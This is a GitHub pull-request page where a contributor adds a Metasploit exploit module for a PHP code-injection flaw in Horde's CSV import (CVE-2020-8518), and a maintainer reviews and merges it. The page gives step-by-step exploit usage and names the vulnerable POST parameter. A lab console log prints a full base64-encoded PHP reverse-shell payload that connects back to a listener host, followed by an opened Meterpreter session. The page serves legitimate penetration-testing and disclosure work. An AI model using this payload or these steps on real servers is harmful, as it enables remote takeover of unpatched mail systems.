Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add 'Horde CSV import arbitrary PHP code execution' (CVE-2020-8518) #13082

Merged
merged 7 commits into from Mar 23, 2020

Conversation

@cyrus-and
Copy link
Contributor

cyrus-and commented Mar 14, 2020

This adds a module for the vulnerability in the subject. Follows an excerpt from the documentation.

Vulnerable Application

The Horde project comprises several standalone applications and libraries, the Horde Groupware Webmail Edition suite (tested version 5.2.22) bundles several of them by default, among those, Data (Horde Data API) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.

Find more information in the original advisory.

Verification Steps

  1. Install the application (see below)
  2. Start msfconsole
  3. Do: use exploit/multi/http/horde_csv_rce
  4. Do: set payload php/meterpreter/reverse_tcp
  5. Do: set lhost [ATTACKER IP]
  6. Do: set rhost [TARGET IP]
  7. Do: set username [username]
  8. Do: set password [password]
  9. Do: exploit
  10. A session should open

Downgrade the Horde Data API package if needed:

pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4

This is my first MSF module submission, I apologize if something's wrong or missing.

Copy link
Contributor

space-r7 left a comment

Hi @cyrus-and, thank you for submitting your module! I have a few comments that are mostly based on style.

modules/exploits/multi/http/horde_csv_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/horde_csv_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/horde_csv_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/horde_csv_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/horde_csv_rce.rb Outdated Show resolved Hide resolved
cyrus-and and others added 5 commits Mar 17, 2020
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@cyrus-and

This comment has been minimized.

Copy link
Contributor Author

cyrus-and commented Mar 17, 2020

Hi @cyrus-and, thank you for submitting your module!

Thanks for the review!

Feel free to eventually squash all the commits, I took advantage of the GitHub interface to accept your proposed changes.

@space-r7 space-r7 self-assigned this Mar 18, 2020
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 23, 2020

Had a few issues getting the software installed, but finally got to test:

msf5 > use exploit/multi/http/horde_csv_rce
msf5 exploit(multi/http/horde_csv_rce) > set rhosts 172.16.215.227
rhosts => 172.16.215.227
msf5 exploit(multi/http/horde_csv_rce) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/http/horde_csv_rce) > set username blah
username => blah
msf5 exploit(multi/http/horde_csv_rce) > set password password
password => password
msf5 exploit(multi/http/horde_csv_rce) > set verbose true
verbose => true
msf5 exploit(multi/http/horde_csv_rce) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Logged in as blah:password
[*] Uploading jbKQiLUt.csv
[+] CSV file uploaded
[*] Sending payload: eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNi4yMTUuMSc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygi.TmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7))
[*] Sending stage (38288 bytes) to 172.16.215.227
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.227:48144) at 2020-03-23 07:27:20 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux

I also changed a few things: randomized the uploaded file, added a vprint_status statement, and removed the threading part. I haven't had any issues testing, but we can add that back if it is necessary for something I'm not seeing.

space-r7 added a commit that referenced this pull request Mar 23, 2020
@space-r7 space-r7 merged commit 40d6dd1 into rapid7:master Mar 23, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 23, 2020

Release Notes

An exploit module is available for the Horde Data API that gets bundled with software such as Horde Groupware Webmail Edition Suite. The Horde Data API before and including v2.1.4 has functionality to handle importing/exporting data such as from CSV files, but fails to properly escape strings while parsing the data. An authenticated user can gain code execution by uploading a CSV file and submitting the payload in the quote parameter of a POST request to mnemo/data.php.

@cyrus-and

This comment has been minimized.

Copy link
Contributor Author

cyrus-and commented Mar 23, 2020

Had a few issues getting the software installed

Thank you! Installing Horde from scratch is not the most pleasant thing to do...

@tdoan-r7 tdoan-r7 added the rn-modules label Apr 1, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants
You can’t perform that action at this time.